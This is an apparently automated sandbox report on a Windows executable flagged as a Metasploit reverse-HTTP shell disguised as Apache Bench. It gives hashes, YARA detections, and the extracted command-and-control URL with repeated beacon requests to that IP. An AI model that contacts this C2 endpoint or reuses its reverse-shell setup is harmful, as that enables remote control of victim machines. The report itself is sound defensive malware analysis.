Edit tour

Windows Analysis Report
DRVf7H9j4V.exe

Overview

General Information

Sample name:	DRVf7H9j4V.exe renamed because original name is a hash value
Original sample name:	ef9e66020f10a61f05bc865b167248d5.exe
Analysis ID:	1520612
MD5:	ef9e66020f10a61f05bc865b167248d5
SHA1:	d17d15d3234e278a6110d1f23ea3369c5c68238c
SHA256:	ec8e8680522e7ecb16043670512d860de1f5ee95b7c3cadb4b6612e92a21af77
Tags:	exeuser-abuse_ch
Infos:

Detection

Metasploit

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Metasploit Payload

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Uses known network protocols on non-standard ports

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Program does not show much activity (idle)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

DRVf7H9j4V.exe (PID: 4136 cmdline: "C:\Users\user\Desktop\DRVf7H9j4V.exe" MD5: EF9E66020F10A61F05BC865B167248D5)

cleanup

Malware Configuration

Threatname: Metasploit

{"Type": "Shell Reverse Http", "URL": "http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
DRVf7H9j4V.exe	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
DRVf7H9j4V.exe	JoeSecurity_MetasploitPayload	Yara detected Metasploit Payload	Joe Security
DRVf7H9j4V.exe	Windows_Trojan_Metasploit_24338919	Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).	unknown	0x162d:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Metasploit_24338919	Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).	unknown	0x62d:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07
00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_24338919	Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).	unknown	0x96:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07
00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Metasploit_24338919	Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).	unknown	0x62d:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.DRVf7H9j4V.exe.400000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.0.DRVf7H9j4V.exe.400000.0.unpack	JoeSecurity_MetasploitPayload	Yara detected Metasploit Payload	Joe Security
0.0.DRVf7H9j4V.exe.400000.0.unpack	Windows_Trojan_Metasploit_24338919	Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).	unknown	0x162d:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07
0.2.DRVf7H9j4V.exe.400000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.2.DRVf7H9j4V.exe.400000.0.unpack	JoeSecurity_MetasploitPayload	Yara detected Metasploit Payload	Joe Security
0.2.DRVf7H9j4V.exe.400000.0.unpack	Windows_Trojan_Metasploit_24338919	Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).	unknown	0x162d:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DRVf7H9j4V.exe

Avira: detected

Found malware configuration

Source: DRVf7H9j4V.exe

Malware Configuration Extractor: Metasploit {"Type": "Shell Reverse Http", "URL": "http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF"}

Multi AV Scanner detection for submitted file

Source: DRVf7H9j4V.exe

ReversingLabs: Detection: 81%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: DRVf7H9j4V.exe

Joe Sandbox ML: detected

Source: DRVf7H9j4V.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:

Binary string: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb source: DRVf7H9j4V.exe

Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 4x nop then xor edx, dword ptr [90909090h]	0_2_0040A430
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 4x nop then push ebp	0_2_00401E39
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 4x nop then sti	0_2_004056C0
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 4x nop then enter FAFFh, 90h	0_2_004066E0
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 4x nop then sti	0_2_004056F0
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 4x nop then or dword ptr [ebx+104D8BECh], 8B08456Dh	0_2_00408680
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 4x nop then xchg dword ptr [eax+21909081h], edx	0_2_004058A1
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 4x nop then sti	0_2_004056B1
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 4x nop then sti	0_2_0040566F
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 4x nop then enter FAFFh, 90h	0_2_004067C3
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 4x nop then xchg dword ptr [eax+21909081h], edx	0_2_004059A4

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 63653 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 63654 -> 7700
Source: unknown	Network traffic detected: HTTP traffic on port 63655 -> 7700

Source: global traffic

TCP traffic: 192.168.2.8:49704 -> 89.197.154.115:7700

Source: Joe Sandbox View

IP Address: 89.197.154.115 89.197.154.115

Source: Joe Sandbox View

ASN Name: VIRTUAL1GB VIRTUAL1GB

Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown	TCP traffic detected without corresponding DNS query: 89.197.154.115

Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache

Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp, DRVf7H9j4V.exe, 00000000.00000002.2240362748.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kq
Source: DRVf7H9j4V.exe	String found in binary or memory: http://www.apache.org/
Source: DRVf7H9j4V.exe	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: DRVf7H9j4V.exe	String found in binary or memory: http://www.zeustech.net/

System Summary

Malicious sample detected (through community Yara rule)

Source: DRVf7H9j4V.exe, type: SAMPLE	Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown

Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 0_2_0040162C		0_2_0040162C
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Code function: 0_2_00690095		0_2_00690095

Source: DRVf7H9j4V.exe, 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameab.exeF vs DRVf7H9j4V.exe
Source: DRVf7H9j4V.exe	Binary or memory string: OriginalFilenameab.exeF vs DRVf7H9j4V.exe

Source: DRVf7H9j4V.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: DRVf7H9j4V.exe, type: SAMPLE	Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23

Source: DRVf7H9j4V.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.winEXE@1/0@0/1

Source: DRVf7H9j4V.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DRVf7H9j4V.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DRVf7H9j4V.exe

ReversingLabs: Detection: 81%

Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe	Section loaded: mswsock.dll	Jump to behavior
